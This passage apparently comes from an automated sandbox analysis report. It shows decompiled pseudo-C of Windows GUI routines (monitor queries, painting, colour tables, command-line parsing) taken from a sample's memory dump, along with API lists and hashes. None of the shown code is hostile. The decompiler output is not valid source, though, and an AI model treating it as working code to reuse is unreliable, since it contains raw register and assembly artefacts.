                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfo
                          • API String ID: 1539801207-1633989206
                          • Opcode ID: faa2bf3c78363656ebe8d97e064c57b15722031e0f0896c89ab185fbcb1d40a4
                          • Instruction ID: 2a61f82873bb2949b7cebe9e3513fa15fd2828733493dc16a17f3e4b77a10526
                          • Opcode Fuzzy Hash: faa2bf3c78363656ebe8d97e064c57b15722031e0f0896c89ab185fbcb1d40a4
                          • Instruction Fuzzy Hash: BD110071606326AFD728CF64BE457A7B7E8FB45310F00852AEC46C7281D3B8B800CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E00727374(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0x76f921 != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *((intOrPtr*)(_t29 + 8)) = 0;
                          						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                          						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L00706548();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					_t26 =  *0x76f908; // 0x727374
                          					 *0x76f908 = E00726F70(5, _t23, _t26, _t27, _t29);
                          					_t24 =  *0x76f908(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 007273CC
                          • GetSystemMetrics.USER32 ref: 007273E1
                          • GetSystemMetrics.USER32 ref: 007273EC
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 00727416
                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoA$tsr
                          • API String ID: 2545840971-1443938628
                          • Opcode ID: 6948204b00c4736a00254b0286c18a602e4944eff56f25d50fa57b22ed9beac3
                          • Instruction ID: fc0b7b83a5d3b733e5d33503d3cf8d3123a53d6f32dfda92e41b44634b1760db
                          • Opcode Fuzzy Hash: 6948204b00c4736a00254b0286c18a602e4944eff56f25d50fa57b22ed9beac3
                          • Instruction Fuzzy Hash: 31110371605365AFD724EF61BD447A7BBE8EB05310F208939ED46C7250D2B8B840CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E00727448(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0x76f922 != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *((intOrPtr*)(_t29 + 8)) = 0;
                          						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                          						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L00706548();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					_t26 =  *0x76f90c; // 0x727448
                          					 *0x76f90c = E00726F70(6, _t23, _t26, _t27, _t29);
                          					_t24 =  *0x76f90c(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 007274A0
                          • GetSystemMetrics.USER32 ref: 007274B5
                          • GetSystemMetrics.USER32 ref: 007274C0
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 007274EA
                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoW$Htr
                          • API String ID: 2545840971-3682609493
                          • Opcode ID: c7b106064d9c087484cbb09baa92b0022544e51a7a205391c70c290a02b66c55
                          • Instruction ID: efb40d469cac4b0b1fc27c853a7c259c79594e88ef358a76f06590662039dc17
                          • Opcode Fuzzy Hash: c7b106064d9c087484cbb09baa92b0022544e51a7a205391c70c290a02b66c55
                          • Instruction Fuzzy Hash: FA110071605325AFD724DF21BD44BA7BBE8EB05310F00852AFD46D7280D6B8B800CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 26%
                          			E007216B4(void* __ebx) {
                          				intOrPtr _v8;
                          				char _v1000;
                          				char _v1004;
                          				char _v1032;
                          				signed int _v1034;
                          				short _v1036;
                          				void* _t24;
                          				intOrPtr _t25;
                          				intOrPtr _t27;
                          				intOrPtr _t29;
                          				intOrPtr _t45;
                          				intOrPtr _t52;
                          				void* _t54;
                          				void* _t55;
                          
                          				_t54 = _t55;
                          				_v1036 = 0x300;
                          				_v1034 = 0x10;
                          				_t25 = E007028C8(_t24, 0x40,  &_v1032);
                          				_push(0);
                          				L007068E8();
                          				_v8 = _t25;
                          				_push(_t54);
                          				_push(0x7217b1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t55 + 0xfffffbf8;
                          				_push(0x68);
                          				_t27 = _v8;
                          				_push(_t27);
                          				L00706630();
                          				_t45 = _t27;
                          				if(_t45 >= 0x10) {
                          					_push( &_v1032);
                          					_push(8);
                          					_push(0);
                          					_push(_v8);
                          					L00706670();
                          					if(_v1004 != 0xc0c0c0) {
                          						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                          						_push(8);
                          						_push(_t45 - 8);
                          						_push(_v8);
                          						L00706670();
                          					} else {
                          						_push( &_v1004);
                          						_push(1);
                          						_push(_t45 - 8);
                          						_push(_v8);
                          						L00706670();
                          						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                          						_push(7);
                          						_push(_t45 - 7);
                          						_push(_v8);
                          						L00706670();
                          						_push( &_v1000);
                          						_push(1);
                          						_push(7);
                          						_push(_v8);
                          						L00706670();
                          					}
                          				}
                          				_pop(_t52);
                          				 *[fs:eax] = _t52;
                          				_push(E007217B8);
                          				_t29 = _v8;
                          				_push(_t29);
                          				_push(0);
                          				L00706B28();
                          				return _t29;
                          			}

                          APIs
                          • 7378AC50.USER32(00000000), ref: 007216E2
                          • 7378AD70.GDI32(?,00000068,00000000,007217B1,?,00000000), ref: 007216FE
                          • 7378AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,007217B1,?,00000000), ref: 0072171D
                          • 7378AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,007217B1,?,00000000), ref: 00721741
                          • 7378AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,007217B1), ref: 0072175F
                          • 7378AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00721773
                          • 7378AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,007217B1,?,00000000), ref: 00721793
                          • 7378B380.USER32(00000000,?,007217B8,007217B1,?,00000000), ref: 007217AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$B380
                          • String ID:
                          • API String ID: 817970651-0
                          • Opcode ID: 8426f57d02829ca92bede9346504a541b55841e4bc6e7a4186ec4d778b853704
                          • Instruction ID: 680804f96925f9ba74f7687556af57af1129d9a20718ebfe2e1b476979e3f84b
                          • Opcode Fuzzy Hash: 8426f57d02829ca92bede9346504a541b55841e4bc6e7a4186ec4d778b853704
                          • Instruction Fuzzy Hash: D02131F5A40218EADB10DBA4CD96FAE73FCEB48704F9005A1F704E62C1D6799F549B24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E0074AC94(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				char _v12;
                          				int _v16;
                          				int _v20;
                          				struct tagPAINTSTRUCT _v84;
                          				intOrPtr _t55;
                          				void* _t64;
                          				struct HDC__* _t75;
                          				intOrPtr _t84;
                          				void* _t95;
                          				void* _t96;
                          				void* _t98;
                          				void* _t100;
                          				void* _t101;
                          				intOrPtr _t102;
                          
                          				_t100 = _t101;
                          				_t102 = _t101 + 0xffffffb0;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t3 =  &_v12; // 0x73263e
                          				_t75 =  *( *_t3 + 4);
                          				if(_t75 == 0) {
                          					_t75 = BeginPaint(E0074CFE0(_v8),  &_v84);
                          				}
                          				_push(_t100);
                          				_push(0x74adb4);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t102;
                          				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                          					_v20 = SaveDC(_t75);
                          					_v16 = 2;
                          					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                          					if(_t95 >= 0) {
                          						_t96 = _t95 + 1;
                          						_t98 = 0;
                          						do {
                          							_t64 = E0071707C( *((intOrPtr*)(_v8 + 0x198)), _t98);
                          							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                          								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                          									goto L11;
                          								} else {
                          									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                          									if(_v16 != 1) {
                          										goto L11;
                          									}
                          								}
                          							} else {
                          								goto L11;
                          							}
                          							goto L12;
                          							L11:
                          							_t98 = _t98 + 1;
                          							_t96 = _t96 - 1;
                          						} while (_t96 != 0);
                          					}
                          					L12:
                          					if(_v16 != 1) {
                          						 *((intOrPtr*)( *_v8 + 0xb8))();
                          					}
                          					RestoreDC(_t75, _v20);
                          				} else {
                          					 *((intOrPtr*)( *_v8 + 0xb8))();
                          				}
                          				E0074ADEC(_v8, 0, _t75);
                          				_pop(_t84);
                          				 *[fs:eax] = _t84;
                          				_push(0x74adbb);
                          				_t41 =  &_v12; // 0x73263e
                          				_t55 =  *_t41;
                          				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                          					return EndPaint(E0074CFE0(_v8),  &_v84);
                          				}
                          				return _t55;
                          			}

                          APIs
                          • BeginPaint.USER32(00000000,?), ref: 0074ACBA
                          • SaveDC.GDI32(?), ref: 0074ACEE
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0074AD50
                          • RestoreDC.GDI32(?,00732617), ref: 0074AD7A
                          • EndPaint.USER32(00000000,?,0074ADBB), ref: 0074ADAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                          • String ID: >&s
                          • API String ID: 3808407030-3680940586
                          • Opcode ID: 2073a333552f5cde487dbbe3617fbac5856c79151eed2d7c286d76ff4b0b6956
                          • Instruction ID: 0832324c83e889f00b14a5bf165f9f8a7a0e513d8288a7e776f59d4db217b8e3
                          • Opcode Fuzzy Hash: 2073a333552f5cde487dbbe3617fbac5856c79151eed2d7c286d76ff4b0b6956
                          • Instruction Fuzzy Hash: 03413B70E40604EFCB14DF98C889FAEB7F9AF48305F1580A8E9049B66ADB399D44CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0072404C(int __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				int _v12;
                          				struct HDC__* _v16;
                          				void* _v20;
                          				struct tagRGBQUAD _v1044;
                          				int _t16;
                          				struct HDC__* _t18;
                          				int _t31;
                          				int _t34;
                          				intOrPtr _t41;
                          				void* _t43;
                          				void* _t46;
                          				void* _t48;
                          				intOrPtr _t49;
                          
                          				_t16 = __eax;
                          				_t46 = _t48;
                          				_t49 = _t48 + 0xfffffbf0;
                          				_v8 = __edx;
                          				_t43 = __eax;
                          				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                          					L4:
                          					return _t16;
                          				} else {
                          					_t16 = L00721908(_v8, 0xff,  &_v1044);
                          					_t34 = _t16;
                          					if(_t34 == 0) {
                          						goto L4;
                          					} else {
                          						_push(0);
                          						L007068E8();
                          						_v12 = _t16;
                          						_t18 = _v12;
                          						_push(_t18);
                          						L00706590();
                          						_v16 = _t18;
                          						_v20 = SelectObject(_v16, _t43);
                          						_push(_t46);
                          						_push(0x7240fb);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t49;
                          						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                          						_pop(_t41);
                          						 *[fs:eax] = _t41;
                          						_push(0x724102);
                          						SelectObject(_v16, _v20);
                          						DeleteDC(_v16);
                          						_t31 = _v12;
                          						_push(_t31);
                          						_push(0);
                          						L00706B28();
                          						return _t31;
                          					}
                          				}
                          			}

                          0x0072404c
                          0x0072404d
                          0x0072404f
                          0x00724057
                          0x0072405a
                          0x0072405e
                          0x00724102
                          0x00724107
                          0x0072406f
                          0x0072407d
                          0x00724082
                          0x00724086
                          0x00000000
                          0x00724088
                          0x00724088
                          0x0072408a
                          0x0072408f
                          0x00724092
                          0x00724095
                          0x00724096
                          0x0072409b
                          0x007240a8
                          0x007240ad
                          0x007240ae
                          0x007240b3
                          0x007240b6
                          0x007240c7
                          0x007240ce
                          0x007240d1
                          0x007240d4
                          0x007240e1
                          0x007240ea
                          0x007240ef
                          0x007240f2
                          0x007240f3
                          0x007240f5
                          0x007240fa
                          0x007240fa
                          0x00724086

                          APIs
                            • Part of subcall function 00721908: GetObjectA.GDI32(?,00000004), ref: 0072191F
                            • Part of subcall function 00721908: 7378AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00724082), ref: 00721942
                          • 7378AC50.USER32(00000000), ref: 0072408A
                          • 7378A590.GDI32(?,00000000), ref: 00724096
                          • SelectObject.GDI32(?), ref: 007240A3
                          • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,007240FB,?,?,?,?,00000000), ref: 007240C7
                          • SelectObject.GDI32(?,?), ref: 007240E1
                          • DeleteDC.GDI32(?), ref: 007240EA
                          • 7378B380.USER32(00000000,?,?,?,?,00724102,?,00000000,007240FB,?,?,?,?,00000000), ref: 007240F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$Object$Select$A590B380ColorDeleteTable
                          • String ID:
                          • API String ID: 1557749399-0
                          • Opcode ID: e8b6a2286073231652af05966643d5bd971eb727106908dc0677aa89f497742f
                          • Instruction ID: 37f70715bcd01b5735e21b24e85bb2ef08353ed4e86c69146c25dc28bf21714b
                          • Opcode Fuzzy Hash: e8b6a2286073231652af05966643d5bd971eb727106908dc0677aa89f497742f
                          • Instruction Fuzzy Hash: B91166B5E00219EFDB10EBE4DC56EAEB7FCEB08300F5045A5F604E7281DA799D508750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E00732470(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr* _v12;
                          				struct HDC__* _v16;
                          				struct tagPAINTSTRUCT _v80;
                          				struct tagRECT _v96;
                          				struct tagRECT _v112;
                          				signed int _v116;
                          				long _v120;
                          				void* __ebp;
                          				void* _t68;
                          				void* _t94;
                          				struct HBRUSH__* _t97;
                          				intOrPtr _t105;
                          				void* _t118;
                          				void* _t127;
                          				intOrPtr _t140;
                          				intOrPtr _t146;
                          				void* _t147;
                          				void* _t148;
                          				void* _t150;
                          				void* _t152;
                          				intOrPtr _t153;
                          
                          				_t148 = __esi;
                          				_t147 = __edi;
                          				_t138 = __edx;
                          				_t127 = __ebx;
                          				_t150 = _t152;
                          				_t153 = _t152 + 0xffffff8c;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t68 =  *_v12 - 0xf;
                          				if(_t68 == 0) {
                          					_v16 =  *(_v12 + 4);
                          					if(_v16 == 0) {
                          						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                          					}
                          					_push(_t150);
                          					_push(0x73263e);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t153;
                          					if(_v16 == 0) {
                          						GetWindowRect( *(_v8 + 0x254),  &_v96);
                          						E00746470(_v8,  &_v120,  &_v96);
                          						_v96.left = _v120;
                          						_v96.top = _v116;
                          						E00745268( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                          					}
                          					E0074AC94(_v8, _t127, _v12, _t147, _t148);
                          					_pop(_t140);
                          					 *[fs:eax] = _t140;
                          					_push(0x73264c);
                          					if(_v16 == 0) {
                          						return EndPaint( *(_v8 + 0x254),  &_v80);
                          					}
                          					return 0;
                          				} else {
                          					_t94 = _t68 - 5;
                          					if(_t94 == 0) {
                          						_t97 = E00720724( *((intOrPtr*)(_v8 + 0x170)));
                          						 *((intOrPtr*)( *_v8 + 0x44))();
                          						FillRect( *(_v12 + 4),  &_v112, _t97);
                          						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                          							GetClientRect( *(_v8 + 0x254),  &_v96);
                          							FillRect( *(_v12 + 4),  &_v96, E00720724( *((intOrPtr*)(_v8 + 0x170))));
                          						}
                          						_t105 = _v12;
                          						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                          					} else {
                          						_t118 = _t94 - 0x2b;
                          						if(_t118 == 0) {
                          							E007323E4(_t150);
                          							_t105 = _v8;
                          							if( *((char*)(_t105 + 0x22f)) == 2) {
                          								if(E0073290C(_v8) == 0 || E00732430(_t138, _t150) == 0) {
                          									_t146 = 1;
                          								} else {
                          									_t146 = 0;
                          								}
                          								_t105 = E0072F750( *(_v8 + 0x254), _t146);
                          							}
                          						} else {
                          							if(_t118 != 0x45) {
                          								_t105 = E007323E4(_t150);
                          							} else {
                          								E007323E4(_t150);
                          								_t105 = _v12;
                          								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                          									_t105 = _v12;
                          									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                          								}
                          							}
                          						}
                          					}
                          					return _t105;
                          				}
                          			}

                          0x00732470
                          0x00732470
                          0x00732470
                          0x00732470
                          0x00732471
                          0x00732473
                          0x00732476
                          0x00732479
                          0x00732481
                          0x00732484
                          0x00732594
                          0x0073259b
                          0x007325b3
                          0x007325b3
                          0x007325b8
                          0x007325b9
                          0x007325be
                          0x007325c1
                          0x007325c8
                          0x007325d8
                          0x007325e6
                          0x007325ee
                          0x007325f4
                          0x00732607
                          0x00732607
                          0x00732612
                          0x00732619
                          0x0073261c
                          0x0073261f
                          0x00732628
                          0x00000000
                          0x00732638
                          0x0073263d
                          0x0073248a
                          0x0073248a
                          0x0073248d
                          0x007324cd
                          0x007324db
                          0x007324e9
                          0x007324f8
                          0x00732514
                          0x00732533
                          0x00732533
                          0x00732538
                          0x0073253b
                          0x0073248f
                          0x0073248f
                          0x00732492
                          0x00732548
                          0x0073254e
                          0x00732558
                          0x00732568
                          0x00732579
                          0x00732575
                          0x00732575
                          0x00732575
                          0x00732584
                          0x00732584
                          0x00732498
                          0x0073249b
                          0x00732646
                          0x007324a1
                          0x007324a2
                          0x007324a8
                          0x007324af
                          0x007324b5
                          0x007324b8
                          0x007324b8
                          0x007324af
                          0x0073249b
                          0x00732492
                          0x0073264f
                          0x0073264f

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Rect$FillPaintWindow$BeginCallClientProc
                          • String ID:
                          • API String ID: 901200654-0
                          • Opcode ID: 32149897f634b6194e29c9f0378a13974d2d4b02b7abe2447186e5a37935a4fc
                          • Instruction ID: d55c29845b2d46641e538a18ddbab45f9f6e57c55f26d4d5715bfd5cc8d10f82
                          • Opcode Fuzzy Hash: 32149897f634b6194e29c9f0378a13974d2d4b02b7abe2447186e5a37935a4fc
                          • Instruction Fuzzy Hash: 5751E875A04108EFDB00DBA8C989E9DB7F9AF09314F5481A5F408EB263D738AE46CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E0071864C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr* _v8;
                          				char _v12;
                          				char _v16;
                          				void* _t36;
                          				void* _t49;
                          				CHAR* _t50;
                          				void* _t60;
                          				void* _t71;
                          				char _t72;
                          				char _t73;
                          				intOrPtr _t88;
                          				CHAR* _t91;
                          				CHAR** _t94;
                          				void* _t95;
                          				void* _t96;
                          				void* _t97;
                          				intOrPtr _t98;
                          
                          				_t96 = _t97;
                          				_t98 = _t97 + 0xfffffff4;
                          				_v16 = 0;
                          				_t71 = __edx;
                          				_v8 = __eax;
                          				_t94 =  &_v12;
                          				 *[fs:eax] = _t98;
                          				L00717ACC(_v8);
                          				 *[fs:eax] = _t98;
                          				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x71877e, _t96,  *[fs:eax], 0x71879b, _t96, __edi, __esi, __ebx, _t95);
                          				 *_t94 = E00704528(_t71);
                          				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                          					 *_t94 = CharNextA( *_t94);
                          				}
                          				while(1) {
                          					_t72 =  *( *_t94);
                          					if(_t72 == 0) {
                          						break;
                          					}
                          					_t36 = E007187C4(_v8);
                          					__eflags = _t72 - _t36;
                          					if(_t72 != _t36) {
                          						_t91 =  *_t94;
                          						while(1) {
                          							_t73 =  *( *_t94);
                          							__eflags = _t73 - 0x20;
                          							if(_t73 <= 0x20) {
                          								break;
                          							}
                          							_t60 = E007187AC(_v8);
                          							__eflags = _t73 - _t60;
                          							if(_t73 != _t60) {
                          								 *_t94 = CharNextA( *_t94);
                          								continue;
                          							}
                          							break;
                          						}
                          						__eflags =  *_t94 - _t91;
                          						E00704158( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
                          					} else {
                          						E007080C0(_t94,  &_v16, E007187C4(_v8));
                          					}
                          					 *((intOrPtr*)( *_v8 + 0x38))();
                          					while(1) {
                          						__eflags =  *( *_t94) - 0xffffffffffffffe1;
                          						if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
                          							break;
                          						}
                          						 *_t94 = CharNextA( *_t94);
                          					}
                          					_t49 = E007187AC(_v8);
                          					__eflags = _t49 -  *( *_t94);
                          					if(_t49 ==  *( *_t94)) {
                          						_t50 = CharNextA( *_t94);
                          						__eflags =  *_t50;
                          						if( *_t50 == 0) {
                          							__eflags = 0;
                          							 *((intOrPtr*)( *_v8 + 0x38))();
                          						}
                          						do {
                          							 *_t94 = CharNextA( *_t94);
                          							__eflags =  *( *_t94) - 0xffffffffffffffe1;
                          						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
                          					}
                          				}
                          				_pop(_t88);
                          				 *[fs:eax] = _t88;
                          				_push(E00718785);
                          				return L00717B88(_v8);
                          			}

                          0x0071864d
                          0x0071864f
                          0x00718657
                          0x0071865a
                          0x0071865c
                          0x0071865f
                          0x0071866d
                          0x00718673
                          0x00718683
                          0x0071868b
                          0x00718695
                          0x007186a3
                          0x007186a1
                          0x007186a1
                          0x0071875c
                          0x0071875e
                          0x00718762
                          0x00000000
                          0x00000000
                          0x007186b4
                          0x007186b9
                          0x007186bb
                          0x007186d3
                          0x007186e1
                          0x007186e3
                          0x007186e5
                          0x007186e8
                          0x00000000
                          0x00000000
                          0x007186ed
                          0x007186f2
                          0x007186f4
                          0x007186df
                          0x00000000
                          0x007186df
                          0x00000000
                          0x007186f4
                          0x007186f8
                          0x007186ff
                          0x007186bd
                          0x007186cc
                          0x007186cc
                          0x0071870c
                          0x0071871b
                          0x00718720
                          0x00718722
                          0x00000000
                          0x00000000
                          0x00718719
                          0x00718719
                          0x00718727
                          0x0071872e
                          0x00718730
                          0x00718735
                          0x0071873a
                          0x0071873d
                          0x0071873f
                          0x00718746
                          0x00718746
                          0x00718749
                          0x00718751
                          0x00718758
                          0x00718758
                          0x00718749
                          0x00718730
                          0x0071876a
                          0x0071876d
                          0x00718770
                          0x0071877d

                          APIs
                          • CharNextA.USER32(?,?,00000000,0071879B), ref: 0071869C
                          • CharNextA.USER32(?,?,00000000,0071879B), ref: 00718714
                          • CharNextA.USER32(?,?,?,00000000,0071879B), ref: 00718735
                          • CharNextA.USER32(00000000,?,?,?,00000000,0071879B), ref: 0071874C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
